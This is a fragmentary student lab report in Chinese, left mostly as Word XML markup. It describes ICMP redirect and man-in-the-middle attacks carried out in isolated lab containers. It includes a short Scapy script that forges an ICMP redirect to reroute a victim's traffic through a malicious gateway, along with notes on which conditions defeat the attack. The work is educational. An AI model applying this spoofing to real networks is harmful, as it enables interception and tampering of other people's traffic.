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第三次实验报告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57118216 丰思飏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Task1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70500" cy="2883535"/>
            <wp:effectExtent l="0" t="0" r="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4768850" cy="1441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5271770" cy="765175"/>
            <wp:effectExtent l="0" t="0" r="1143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重定向程序如下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#!/usr/bin/python3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scapy.all import *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 = IP(src = "10.9.0.11", dst = "10.9.0.5")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icmp = ICMP(type=5, code=0)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icmp.gw = "10.9.0.111"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The enclosed IP packet should be the one that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triggers the redirect message.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ip2 = IP(src = "10.9.0.5", dst = "192.168.60.5")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send(ip/icmp/ip2/ICMP());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ping时连续执行程序后连续执行重定向程序</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2755265" cy="3294380"/>
            <wp:effectExtent l="0" t="0" r="63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查看ip route信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273040" cy="2407920"/>
            <wp:effectExtent l="0" t="0" r="1016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查看mtr -n</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271770" cy="663575"/>
            <wp:effectExtent l="0" t="0" r="1143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重定向成功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使用外网地址192.168.1.102</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269230" cy="1386205"/>
            <wp:effectExtent l="0" t="0" r="127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无法重定向，使用默认网关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使用子网内不存在的主机地址</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="1120140"/>
            <wp:effectExtent l="0" t="0" r="1079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无法重定向，使用默认网关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更改配置文件开启防御机制后进行攻击</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271770" cy="663575"/>
            <wp:effectExtent l="0" t="0" r="1143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无法重定向成功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Task2</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/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在恶意路由器上关闭IP转发</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269230" cy="737870"/>
            <wp:effectExtent l="0" t="0" r="127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eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在目标容器192.168.60.5上，启动netcat服务器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，在受害者容器上，连接到服务器</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="1156970"/>
            <wp:effectExtent l="0" t="0" r="0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9865" cy="811530"/>
            <wp:effectExtent l="0" t="0" r="63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已建立起连接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050665" cy="1026795"/>
            <wp:effectExtent l="0" t="0" r="635" b="190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4695825" cy="1333500"/>
            <wp:effectExtent l="0" t="0" r="3175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中间人攻击前可以正常传输数据，中间人攻击后替换成功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只需要获取从受害者到192.168.60.5的流量。重定向和中间人攻击针对的是受害者10.9.0.5，只要将source为10.9.0.5的流量进行拦截和篡改就可以实现中间人攻击。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E638B"/>
    <w:rsid w:val="01616524"/>
    <w:rsid w:val="03E52134"/>
    <w:rsid w:val="04E92AF9"/>
    <w:rsid w:val="05A77424"/>
    <w:rsid w:val="0E636232"/>
    <w:rsid w:val="112D006E"/>
    <w:rsid w:val="14837AF9"/>
    <w:rsid w:val="167C0DA7"/>
    <w:rsid w:val="1C125AE5"/>
    <w:rsid w:val="1D1D4E84"/>
    <w:rsid w:val="20E125C0"/>
    <w:rsid w:val="263B120C"/>
    <w:rsid w:val="2AD941D4"/>
    <w:rsid w:val="312469A3"/>
    <w:rsid w:val="35136D7F"/>
    <w:rsid w:val="351F6F64"/>
    <w:rsid w:val="395D024D"/>
    <w:rsid w:val="3A1068F8"/>
    <w:rsid w:val="3AC82286"/>
    <w:rsid w:val="3D6D4EEF"/>
    <w:rsid w:val="3FC62260"/>
    <w:rsid w:val="40F07500"/>
    <w:rsid w:val="40F46C40"/>
    <w:rsid w:val="4301060B"/>
    <w:rsid w:val="437057A6"/>
    <w:rsid w:val="45137177"/>
    <w:rsid w:val="47630009"/>
    <w:rsid w:val="48271539"/>
    <w:rsid w:val="494C01A2"/>
    <w:rsid w:val="4B100496"/>
    <w:rsid w:val="4C1A5228"/>
    <w:rsid w:val="51A82D65"/>
    <w:rsid w:val="5A8F6DE0"/>
    <w:rsid w:val="66A81F27"/>
    <w:rsid w:val="6BE55400"/>
    <w:rsid w:val="6F7D439A"/>
    <w:rsid w:val="70B57DA7"/>
    <w:rsid w:val="734F3672"/>
    <w:rsid w:val="7837757A"/>
    <w:rsid w:val="7B9D3CE6"/>
    <w:rsid w:val="7F18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2021-07-12T00:47:52Z</dcterms:created>
  <dc:creator>dell</dc:creator>
  <cp:lastModifiedBy>丰思飏</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-07-12T11:50:26Z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324C238D7FF644ACAB77ED267A14B80B</vt:lpwstr>
  </property>
</Properties>
</file>